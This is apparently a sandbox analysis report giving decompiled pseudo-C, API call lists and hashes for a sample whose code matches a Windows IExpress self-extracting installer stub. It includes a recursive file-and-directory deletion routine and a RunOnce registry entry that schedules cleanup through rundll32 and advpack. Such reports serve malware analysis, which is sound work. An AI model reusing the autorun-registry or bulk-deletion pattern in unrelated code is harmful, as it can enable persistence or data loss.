                                                				_t9 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t9 ^ _t46;
                                                				if( *0x2f8a38 != 0) {
                                                					L5:
                                                					_t11 = E002F5164(_t52);
                                                					_t53 = _t11;
                                                					if(_t11 == 0) {
                                                						L16:
                                                						_t12 = 0;
                                                						L17:
                                                						return E002F6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                					}
                                                					_t14 = E002F55A0(_t53); // executed
                                                					if(_t14 == 0) {
                                                						goto L16;
                                                					} else {
                                                						_t45 = 0x105;
                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                						_t43 = 0x105;
                                                						_t40 =  &_v272;
                                                						E002F658A( &_v272, 0x105, "advapi32.dll");
                                                						_t36 = LoadLibraryA( &_v272);
                                                						_t44 = 0;
                                                						if(_t36 != 0) {
                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                							_v276 = _t31;
                                                							if(_t31 != 0) {
                                                								_t45 = _t47;
                                                								_t40 = _t31;
                                                								 *0x2fa288("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                								_v276();
                                                								if(_t47 != _t47) {
                                                									_t40 = 4;
                                                									asm("int 0x29");
                                                								}
                                                							}
                                                						}
                                                						FreeLibrary(_t36);
                                                						_t58 =  *0x2f8a24 - _t44; // 0x0
                                                						if(_t58 != 0) {
                                                							L14:
                                                							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                							if(_t21 != 0) {
                                                								__eflags =  *0x2f8a2c - _t44; // 0x0
                                                								if(__eflags != 0) {
                                                									L20:
                                                									__eflags =  *0x2f8d48 & 0x000000c0;
                                                									if(( *0x2f8d48 & 0x000000c0) == 0) {
                                                										_t41 =  *0x2f9a40; // 0x3, executed
                                                										_t26 = E002F256D(_t41); // executed
                                                										_t44 = _t26;
                                                									}
                                                									_t22 =  *0x2f8a24; // 0x0
                                                									 *0x2f9a44 = _t44;
                                                									__eflags = _t22;
                                                									if(_t22 != 0) {
                                                										L26:
                                                										__eflags =  *0x2f8a38;
                                                										if( *0x2f8a38 == 0) {
                                                											__eflags = _t22;
                                                											if(__eflags == 0) {
                                                												E002F4169(__eflags);
                                                											}
                                                										}
                                                										_t12 = 1;
                                                										goto L17;
                                                									} else {
                                                										__eflags =  *0x2f9a30 - _t22; // 0x0
                                                										if(__eflags != 0) {
                                                											goto L26;
                                                										}
                                                										_t25 = E002F3BA2(); // executed
                                                										__eflags = _t25;
                                                										if(_t25 == 0) {
                                                											goto L16;
                                                										}
                                                										_t22 =  *0x2f8a24; // 0x0
                                                										goto L26;
                                                									}
                                                								}
                                                								_t27 = E002F3B26(_t40, _t44);
                                                								__eflags = _t27;
                                                								if(_t27 == 0) {
                                                									goto L16;
                                                								}
                                                								goto L20;
                                                							}
                                                							_t43 = 0x4bc;
                                                							E002F44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                							 *0x2f9124 = E002F6285();
                                                							goto L16;
                                                						}
                                                						_t59 =  *0x2f9a30 - _t44; // 0x0
                                                						if(_t59 != 0) {
                                                							goto L14;
                                                						}
                                                						_t30 = E002F621E(); // executed
                                                						if(_t30 == 0) {
                                                							goto L16;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				_t49 =  *0x2f8a24;
                                                				if( *0x2f8a24 != 0) {
                                                					L4:
                                                					_t34 = E002F3A3F(_t51);
                                                					_t52 = _t34;
                                                					if(_t34 == 0) {
                                                						goto L16;
                                                					}
                                                					goto L5;
                                                				}
                                                				if(E002F51E5(_t49) == 0) {
                                                					goto L16;
                                                				}
                                                				_t51 =  *0x2f8a38;
                                                				if( *0x2f8a38 != 0) {
                                                					goto L5;
                                                				}
                                                				goto L4;
                                                			}




























                                                0x002f2f1d
                                                0x002f2f28
                                                0x002f2f2f
                                                0x002f2f3d
                                                0x002f2f6c
                                                0x002f2f6c
                                                0x002f2f71
                                                0x002f2f73
                                                0x002f3041
                                                0x002f3041
                                                0x002f3043
                                                0x002f3053
                                                0x002f3053
                                                0x002f2f79
                                                0x002f2f80
                                                0x00000000
                                                0x002f2f86
                                                0x002f2f86
                                                0x002f2f93
                                                0x002f2f9e
                                                0x002f2fa0
                                                0x002f2fa6
                                                0x002f2fb8
                                                0x002f2fba
                                                0x002f2fbe
                                                0x002f2fc6
                                                0x002f2fcc
                                                0x002f2fd4
                                                0x002f2fd6
                                                0x002f2fd8
                                                0x002f2fe0
                                                0x002f2fe6
                                                0x002f2fee
                                                0x002f2ff0
                                                0x002f2ff5
                                                0x002f2ff5
                                                0x002f2fee
                                                0x002f2fd4
                                                0x002f2ff8
                                                0x002f2ffe
                                                0x002f3004
                                                0x002f3017
                                                0x002f301c
                                                0x002f3024
                                                0x002f3054
                                                0x002f305a
                                                0x002f3065
                                                0x002f3065
                                                0x002f306c
                                                0x002f306e
                                                0x002f3075
                                                0x002f307a
                                                0x002f307a
                                                0x002f307c
                                                0x002f3081
                                                0x002f3087
                                                0x002f3089
                                                0x002f30a1
                                                0x002f30a1
                                                0x002f30a9
                                                0x002f30ab
                                                0x002f30ad
                                                0x002f30af
                                                0x002f30af
                                                0x002f30ad
                                                0x002f30b6
                                                0x00000000
                                                0x002f308b
                                                0x002f308b
                                                0x002f3091
                                                0x00000000
                                                0x00000000
                                                0x002f3093
                                                0x002f3098
                                                0x002f309a
                                                0x00000000
                                                0x00000000
                                                0x002f309c
                                                0x00000000
                                                0x002f309c
                                                0x002f3089
                                                0x002f305c
                                                0x002f3061
                                                0x002f3063
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3063
                                                0x002f302b
                                                0x002f3032
                                                0x002f303c
                                                0x00000000
                                                0x002f303c
                                                0x002f3006
                                                0x002f300c
                                                0x00000000
                                                0x00000000
                                                0x002f300e
                                                0x002f3015
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3015
                                                0x002f2f80
                                                0x002f2f3f
                                                0x002f2f46
                                                0x002f2f5f
                                                0x002f2f5f
                                                0x002f2f64
                                                0x002f2f66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f2f66
                                                0x002f2f4f
                                                0x00000000
                                                0x00000000
                                                0x002f2f55
                                                0x002f2f5d
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 002F2F93
                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 002F2FB2
                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 002F2FC6
                                                • DecryptFileA.ADVAPI32 ref: 002F2FE6
                                                • FreeLibrary.KERNEL32(00000000), ref: 002F2FF8
                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F301C
                                                  • Part of subcall function 002F51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F4D,?,00000002,00000000), ref: 002F5201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                • API String ID: 2126469477-1932822326
                                                • Opcode ID: c3b60d85ccceb8cd884fe302105b808e3e8123333dbeb15b9abea21153d27227
                                                • Instruction ID: 3be6dab47c288a84ce98312bc184ca8e19bceb7cac77f78633c64953dbb6de9b
                                                • Opcode Fuzzy Hash: c3b60d85ccceb8cd884fe302105b808e3e8123333dbeb15b9abea21153d27227
                                                • Instruction Fuzzy Hash: 5A41823063020E9ADB20EF71BD49776F6A8DB557E0F10017AEB45C2591EF748EA4CE51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 86%
                                                			E002F2390(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v280;
                                                				char _v284;
                                                				struct _WIN32_FIND_DATAA _v596;
                                                				struct _WIN32_FIND_DATAA _v604;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				int _t36;
                                                				void* _t46;
                                                				void* _t62;
                                                				void* _t63;
                                                				CHAR* _t65;
                                                				void* _t66;
                                                				signed int _t67;
                                                				signed int _t69;
                                                
                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                				_t21 =  *0x2f8004; // 0x404cc811
                                                				_t22 = _t21 ^ _t69;
                                                				_v8 = _t21 ^ _t69;
                                                				_t65 = __ecx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                					L10:
                                                					_pop(_t62);
                                                					_pop(_t66);
                                                					_pop(_t46);
                                                					return E002F6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                				} else {
                                                					E002F1680( &_v276, 0x104, __ecx);
                                                					_t58 = 0x104;
                                                					E002F16B3( &_v280, 0x104, "*");
                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                					_t63 = _t22;
                                                					if(_t63 == 0xffffffff) {
                                                						goto L10;
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t58 = 0x104;
                                                						E002F1680( &_v276, 0x104, _t65);
                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                							_t58 = 0x104;
                                                							E002F16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                							SetFileAttributesA( &_v280, 0x80);
                                                							DeleteFileA( &_v280);
                                                						} else {
                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                								E002F16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                								_t58 = 0x104;
                                                								E002F658A( &_v280, 0x104, 0x2f1140);
                                                								E002F2390( &_v284);
                                                							}
                                                						}
                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                					} while (_t36 != 0);
                                                					FindClose(_t63); // executed
                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                					goto L10;
                                                				}
                                                			}





















                                                0x002f2398
                                                0x002f239e
                                                0x002f23a3
                                                0x002f23a5
                                                0x002f23ae
                                                0x002f23b3
                                                0x002f24cb
                                                0x002f24d2
                                                0x002f24d3
                                                0x002f24d4
                                                0x002f24df
                                                0x002f23c2
                                                0x002f23d1
                                                0x002f23db
                                                0x002f23e4
                                                0x002f23f6
                                                0x002f23fc
                                                0x002f2401
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f2407
                                                0x002f2407
                                                0x002f2408
                                                0x002f2411
                                                0x002f241f
                                                0x002f247a
                                                0x002f2483
                                                0x002f2495
                                                0x002f24a3
                                                0x002f2421
                                                0x002f242f
                                                0x002f2453
                                                0x002f245d
                                                0x002f2466
                                                0x002f2472
                                                0x002f2472
                                                0x002f242f
                                                0x002f24af
                                                0x002f24b5
                                                0x002f24be
                                                0x002f24c5
                                                0x00000000
                                                0x002f24c5

                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,002F8A3A,002F11F4,002F8A3A,00000000,?,?), ref: 002F23F6
                                                • lstrcmpA.KERNEL32(?,002F11F8), ref: 002F2427
                                                • lstrcmpA.KERNEL32(?,002F11FC), ref: 002F243B
                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 002F2495
                                                • DeleteFileA.KERNEL32(?), ref: 002F24A3
                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 002F24AF
                                                • FindClose.KERNELBASE(00000000), ref: 002F24BE
                                                • RemoveDirectoryA.KERNELBASE(002F8A3A), ref: 002F24C5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                • String ID:
                                                • API String ID: 836429354-0
                                                • Opcode ID: 11938f1ecbb52f5522b7d6fb42f5892362ff5a45145e9590a0154bd95bf24da1
                                                • Instruction ID: 0849c56e91d2a034fb271ae04dd2975dd4044bf2aebafb6f6f0cbe71698ae575
                                                • Opcode Fuzzy Hash: 11938f1ecbb52f5522b7d6fb42f5892362ff5a45145e9590a0154bd95bf24da1
                                                • Instruction Fuzzy Hash: 7D31A271214648DBC320DF64EC4DEFBB3ACAB85391F44093DA649C2190EF74992CCB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E002F2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long _t4;
                                                				void* _t6;
                                                				intOrPtr _t7;
                                                				void* _t9;
                                                				struct HINSTANCE__* _t12;
                                                				intOrPtr* _t17;
                                                				signed char _t19;
                                                				intOrPtr* _t21;
                                                				void* _t22;
                                                				void* _t24;
                                                				intOrPtr _t32;
                                                
                                                				_t4 = GetVersion();
                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                					if(_t12 != 0) {
                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                						if(_t21 != 0) {
                                                							_t17 = _t21;
                                                							 *0x2fa288(0, 1, 0, 0);
                                                							 *_t21();
                                                							_t29 = _t24 - _t24;
                                                							if(_t24 != _t24) {
                                                								_t17 = 4;
                                                								asm("int 0x29");
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t20 = _a12;
                                                				_t18 = _a4;
                                                				 *0x2f9124 = 0;
                                                				if(E002F2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                					_t9 = E002F2F1D(_t18, _t20); // executed
                                                					_t22 = _t9; // executed
                                                					E002F52B6(0, _t18, _t21, _t22); // executed
                                                					if(_t22 != 0) {
                                                						_t32 =  *0x2f8a3a; // 0x0
                                                						if(_t32 == 0) {
                                                							_t19 =  *0x2f9a2c; // 0x0
                                                							if((_t19 & 0x00000001) != 0) {
                                                								E002F1F90(_t19, _t21, _t22);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t6 =  *0x2f8588; // 0x0
                                                				if(_t6 != 0) {
                                                					CloseHandle(_t6);
                                                				}
                                                				_t7 =  *0x2f9124; // 0x0
                                                				return _t7;
                                                			}


















                                                0x002f2c03
                                                0x002f2c0d
                                                0x002f2c18
                                                0x002f2c20
                                                0x002f2c2e
                                                0x002f2c32
                                                0x002f2c36
                                                0x002f2c3d
                                                0x002f2c43
                                                0x002f2c45
                                                0x002f2c47
                                                0x002f2c49
                                                0x002f2c4e
                                                0x002f2c4e
                                                0x002f2c47
                                                0x002f2c32
                                                0x002f2c20
                                                0x002f2c50
                                                0x002f2c54
                                                0x002f2c57
                                                0x002f2c64
                                                0x002f2c66
                                                0x002f2c6b
                                                0x002f2c6d
                                                0x002f2c74
                                                0x002f2c76
                                                0x002f2c7c
                                                0x002f2c7e
                                                0x002f2c87
                                                0x002f2c89
                                                0x002f2c89
                                                0x002f2c87
                                                0x002f2c7c
                                                0x002f2c74
                                                0x002f2c8e
                                                0x002f2c95
                                                0x002f2c98
                                                0x002f2c98
                                                0x002f2c9e
                                                0x002f2ca7

                                                APIs
                                                • GetVersion.KERNEL32(?,00000002,00000000,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C03
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C18
                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 002F2C28
                                                • CloseHandle.KERNEL32(00000000,?,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                • String ID: HeapSetInformation$Kernel32.dll
                                                • API String ID: 62482547-3460614246
                                                • Opcode ID: 83ac3e40845421d7added49e1a5a42046ba62da70fceae06b5bbfa4e37db979d
                                                • Instruction ID: ca11019c45de3d7b2c499df891e75c2e26adbbec1e03706e276e6d7ab2b5b16a
                                                • Opcode Fuzzy Hash: 83ac3e40845421d7added49e1a5a42046ba62da70fceae06b5bbfa4e37db979d
                                                • Instruction Fuzzy Hash: 3511917122021AEBD7106FB5BC9DF7BB75D9B863E0B060136BB08D3251DA31DC69CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F6F40() {
                                                
                                                				SetUnhandledExceptionFilter(E002F6EF0); // executed
                                                				return 0;
                                                			}



                                                0x002f6f45
                                                0x002f6f4d

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 002F6F45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 9e18f5d08b1c22755f1d83525e37987a4b5599c757cb53dd47c1df44a3561b6a
                                                • Instruction ID: 80a2f18924dbffb550f8e99463623205ff0ab4338023bc816e65472f3fa1871d
                                                • Opcode Fuzzy Hash: 9e18f5d08b1c22755f1d83525e37987a4b5599c757cb53dd47c1df44a3561b6a
                                                • Instruction Fuzzy Hash: C89002A52611084B97101B70AD1D836B5919A4E692F825470E119C4494DB6040509512
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 93%
                                                			E002F202A(struct HINSTANCE__* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				void* _v532;
                                                				int _v536;
                                                				int _v540;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				long _t36;
                                                				long _t41;
                                                				struct HINSTANCE__* _t46;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				CHAR* _t54;
                                                				void _t56;
                                                				signed int _t66;
                                                				intOrPtr* _t72;
                                                				void* _t73;
                                                				void* _t75;
                                                				void* _t80;
                                                				intOrPtr* _t81;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t90;
                                                				_Unknown_base(*)()* _t91;
                                                				signed int _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                
                                                				_t79 = __edx;
                                                				_t28 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t28 ^ _t93;
                                                				_t84 = 0x104;
                                                				memset( &_v268, 0, 0x104);
                                                				memset( &_v528, 0, 0x104);
                                                				_t95 = _t94 + 0x18;
                                                				_t66 = 0;
                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                				if(_t36 != 0) {
                                                					L24:
                                                					return E002F6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                				}
                                                				_push(_t86);
                                                				_t87 = 0;
                                                				while(1) {
                                                					E002F171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                					_t95 = _t95 + 0x10;
                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                					if(_t41 != 0) {
                                                						break;
                                                					}
                                                					_t87 = _t87 + 1;
                                                					if(_t87 < 0xc8) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				if(_t87 != 0xc8) {
                                                					GetSystemDirectoryA( &_v528, _t84);
                                                					_t79 = _t84;
                                                					E002F658A( &_v528, _t84, "advpack.dll");
                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                					_t84 = _t46;
                                                					if(_t84 == 0) {
                                                						L10:
                                                						if(GetModuleFileNameA( *0x2f9a3c,  &_v268, 0x104) == 0) {
                                                							L17:
                                                							_t36 = RegCloseKey(_v532);
                                                							L23:
                                                							_pop(_t86);
                                                							goto L24;
                                                						}
                                                						L11:
                                                						_t72 =  &_v268;
                                                						_t80 = _t72 + 1;
                                                						do {
                                                							_t49 =  *_t72;
                                                							_t72 = _t72 + 1;
                                                						} while (_t49 != 0);
                                                						_t73 = _t72 - _t80;
                                                						_t81 = 0x2f91e4;
                                                						do {
                                                							_t50 =  *_t81;
                                                							_t81 = _t81 + 1;
                                                						} while (_t50 != 0);
                                                						_t84 = _t73 + 0x50 + _t81 - 0x2f91e5;
                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x2f91e5);
                                                						if(_t90 != 0) {
                                                							 *0x2f8580 = _t66 ^ 0x00000001;
                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                							if(_t66 == 0) {
                                                								_t54 = "%s /D:%s";
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                							E002F171E(_t90, _t84, _t54,  &_v268);
                                                							_t75 = _t90;
                                                							_t23 = _t75 + 1; // 0x1
                                                							_t79 = _t23;
                                                							do {
                                                								_t56 =  *_t75;
                                                								_t75 = _t75 + 1;
                                                							} while (_t56 != 0);
                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                							RegCloseKey(_v532); // executed
                                                							_t36 = LocalFree(_t90);
                                                							goto L23;
                                                						}
                                                						_t79 = 0x4b5;
                                                						E002F44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                						goto L17;
                                                					}
                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                					_t66 = 0 | _t91 != 0x00000000;
                                                					FreeLibrary(_t84); // executed
                                                					if(_t91 == 0) {
                                                						goto L10;
                                                					}
                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                						E002F658A( &_v268, 0x104, 0x2f1140);
                                                					}
                                                					goto L11;
                                                				}
                                                				_t36 = RegCloseKey(_v532);
                                                				 *0x2f8530 = _t66;
                                                				goto L23;
                                                			}

































                                                0x002f202a
                                                0x002f2035
                                                0x002f203c
                                                0x002f2041
                                                0x002f2050
                                                0x002f205f
                                                0x002f2064
                                                0x002f206f
                                                0x002f208c
                                                0x002f2094
                                                0x002f2257
                                                0x002f2266
                                                0x002f2266
                                                0x002f209a
                                                0x002f209b
                                                0x002f209d
                                                0x002f20aa
                                                0x002f20af
                                                0x002f20c9
                                                0x002f20d1
                                                0x00000000
                                                0x00000000
                                                0x002f20d3
                                                0x002f20da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f20da
                                                0x002f20e2
                                                0x002f2103
                                                0x002f210e
                                                0x002f2116
                                                0x002f2122
                                                0x002f2128
                                                0x002f212c
                                                0x002f2179
                                                0x002f2194
                                                0x002f21de
                                                0x002f21e4
                                                0x002f2256
                                                0x002f2256
                                                0x00000000
                                                0x002f2256
                                                0x002f2196
                                                0x002f2196
                                                0x002f219c
                                                0x002f219f
                                                0x002f219f
                                                0x002f21a1
                                                0x002f21a2
                                                0x002f21a6
                                                0x002f21a8
                                                0x002f21b0
                                                0x002f21b0
                                                0x002f21b2
                                                0x002f21b3
                                                0x002f21bc
                                                0x002f21c7
                                                0x002f21cb
                                                0x002f21f1
                                                0x002f21f6
                                                0x002f21fd
                                                0x002f21ff
                                                0x002f21ff
                                                0x002f2204
                                                0x002f2213
                                                0x002f2218
                                                0x002f221d
                                                0x002f221d
                                                0x002f2220
                                                0x002f2220
                                                0x002f2222
                                                0x002f2223
                                                0x002f2229
                                                0x002f223d
                                                0x002f2249
                                                0x002f2250
                                                0x00000000
                                                0x002f2250
                                                0x002f21d2
                                                0x002f21d9
                                                0x00000000
                                                0x002f21d9
                                                0x002f213a
                                                0x002f2141
                                                0x002f2144
                                                0x002f214c
                                                0x00000000
                                                0x00000000
                                                0x002f2163
                                                0x002f2172
                                                0x002f2172
                                                0x00000000
                                                0x002f2163
                                                0x002f20ea
                                                0x002f20f0
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 002F2050
                                                • memset.MSVCRT ref: 002F205F
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 002F208C
                                                  • Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750
                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F20C9
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F20EA
                                                • GetSystemDirectoryA.KERNEL32 ref: 002F2103
                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2122
                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 002F2134
                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2144
                                                • GetSystemDirectoryA.KERNEL32 ref: 002F215B
                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F218C
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F21C1
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F21E4
                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 002F223D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2249
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2250
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                • API String ID: 178549006-3388056274
                                                • Opcode ID: e89a0a6c817317aa7cfa1cad16990d42dce4fd89dc42f00cf16922d087538e9d
